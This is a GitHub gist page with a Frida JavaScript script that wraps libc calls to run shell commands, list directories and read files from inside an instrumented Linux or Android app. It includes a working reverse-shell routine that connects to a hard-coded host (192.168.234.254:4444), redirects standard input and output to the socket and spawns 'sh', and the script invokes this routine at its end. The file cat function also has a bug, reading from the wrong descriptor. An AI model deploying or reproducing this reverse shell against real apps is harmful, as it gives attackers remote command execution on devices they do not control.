Skip to content

Instantly share code, notes, and snippets.

@FrankSpierings

FrankSpierings/shell.js

Last active March 4, 2025 22:23
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save FrankSpierings/967381eb3f500f64334b6a00f2425eb3 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save FrankSpierings/967381eb3f500f64334b6a00f2425eb3 to your computer and use it in GitHub Desktop.
Download ZIP
Frida - Linux Shell From App Perspective (Tested on 32-bit...)
Raw
shell.js
libc = {
library: 'libc.so',
system: function(command) {
f = new NativeFunction(Module.findExportByName(this.library, "system"), 'int32', ['pointer']);
retval = f(Memory.allocUtf8String(command));
return retval;
},
open: function(path, mode) {
f = new NativeFunction(Module.findExportByName(this.library, "open"), 'int32', ['pointer', 'int32']);
retval = f(Memory.allocUtf8String(path), mode);
return retval;
},
read: function(fd, buffer, nbyte) {
f = new NativeFunction(Module.findExportByName(this.library, "read"), 'int32', ['int32', 'pointer', 'int32']);
retval = f(fd, buffer, nbyte);
return retval;
},
opendir: function(directory) {
f = new NativeFunction(Module.findExportByName(this.library, "opendir"), 'pointer', ['pointer']);
retval = f(Memory.allocUtf8String(directory));
return retval;
},
readdir: function(DIR) {
f = new NativeFunction(Module.findExportByName(this.library, "readdir"), 'pointer', ['pointer']);
retval = f(DIR);
return retval;
},
pipe: function() {
fildes = Memory.alloc(4*2);
f = new NativeFunction(Module.findExportByName(this.library, "pipe"), 'int32', ['pointer']);
retval = f(fildes);
return {
retval: retval,
fildes0: Memory.readPointer(fildes).toInt32(),
fildes1: Memory.readPointer(new NativePointer(fildes.toInt32() + 4)).toInt32(),
}
},
dup2: function(fildes0, fildes1) {
f = new NativeFunction(Module.findExportByName(this.library, "dup2"), 'int32', ['int32', 'int32']);
retval = f(fildes0, fildes1);
return retval;
},
dup: function(fildes0) {
f = new NativeFunction(Module.findExportByName(this.library, "dup"), 'int32', ['int32']);
retval = f(fildes0);
return retval;
},
close: function(fildes) {
f = new NativeFunction(Module.findExportByName(this.library, "close"), 'int32', ['int32']);
retval = f(fildes);
return retval;
},
fcntl: function(fildes, cmd, args) {
f = new NativeFunction(Module.findExportByName(this.library, "fcntl"), 'int32', ['int32', 'int32', 'int32']);
retval = f(fildes, cmd, args);
return retval;
},
socket: function(domain, type, protocol) {
f = new NativeFunction(Module.findExportByName(this.library, 'socket'), 'int32', ['int32', 'int32', 'int32']);
retval = f(domain, type, protocol);
return retval;
},
connect: function(fd, sa, size) {
f = new NativeFunction(Module.findExportByName(this.library, 'connect'), 'int32', ['int32', 'pointer', 'int32']);
retval = f(fd, sa, size);
return retval;
},
htons: function(port) {
f = new NativeFunction(Module.findExportByName(this.library, 'htons'), 'uint32', ['uint32']);
retval = f(port);
return retval;
},
inet_addr: function(address) {
f = new NativeFunction(Module.findExportByName(this.library, 'inet_addr'), 'uint32', ['pointer']);
retval = f(Memory.allocUtf8String(address));
return retval;
},
}
shell = {
ls: function(directory) {
DIR = libc.opendir(directory);
while (true) {
entry = libc.readdir(DIR);
if (entry==0) {
break;
}
else {
name_offset = 4 + 4 + 2 + 4 + 4 + 1;
name =new NativePointer(entry.toInt32() + (name_offset));
console.log(Memory.readUtf8String(name));
}
}
},
system: function(command) {
F_SETFL = 4;
O_NONBLOCK = 4000;
BUFSIZE=4096
fds = libc.pipe()
libc.dup2(fds.fildes1, 1);
libc.dup2(fds.fildes1, 2);
// No buffering, thank you very much
libc.fcntl(fds.fildes0, F_SETFL, O_NONBLOCK);
buffer = Memory.alloc(BUFSIZE);
retval = libc.system(command);
while (true) {
nbytes = libc.read(fds.fildes0, buffer, BUFSIZE);
if (nbytes<=0) {
libc.close(fds.fildes0);
libc.close(fds.fildes1);
break;
}
tmp = new Uint8Array(Memory.readByteArray(buffer,nbytes));
str = "";
for(var i = 0; i < tmp.length; i++) {
str += String.fromCharCode(tmp[i]);
}
console.log(str);
}
},
cat: function(path) {
BUFSIZE=4096;
fd = libc.open(path, 0);
if (fd > -1) {
buffer = Memory.alloc(BUFSIZE);
while (true) {
nbytes = libc.read(fds.fildes0, buffer, BUFSIZE);
if (nbytes<=0) {
libc.close(fd);
break;
}
tmp = new Uint8Array(Memory.readByteArray(buffer,nbytes));
str = "";
for(var i = 0; i < tmp.length; i++) {
str += String.fromCharCode(tmp[i]);
}
console.log(str);
}
}
},
revtcp: function(host, port) {
/* sa struct:
short (2 bytes): sin_family
ushort (2 bytes): sin_port
int (4 bytes): sin_addr
char[8](8 bytes): sin_zero*/
AF_INET = 0x0002;
SOCK_STREAM = 1;
sa_size = 2 + 2 + 4 + 8;
sa = Memory.alloc(sa_size);
p_sin_family = new NativePointer(sa.toInt32());
Memory.writeShort(p_sin_family, AF_INET);
p_sin_port = new NativePointer(sa.toInt32() + 2);
Memory.writeUShort(p_sin_port, libc.htons(port));
p_sin_addr = new NativePointer(sa.toInt32() + 2 + 2);
Memory.writeU32(p_sin_addr, libc.inet_addr(host));
// console.log(hexdump(sa,{length: 16}))
s = libc.socket(AF_INET, SOCK_STREAM, 0);
c = libc.connect(s, sa, sa_size);
libc.dup2(s, 0);
libc.dup2(s, 1);
libc.dup2(s, 2);
libc.system('sh');
}
}
shell.system('ls; id');
shell.cat('/proc/self/maps');
shell.revtcp('192.168.234.254', 4444);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment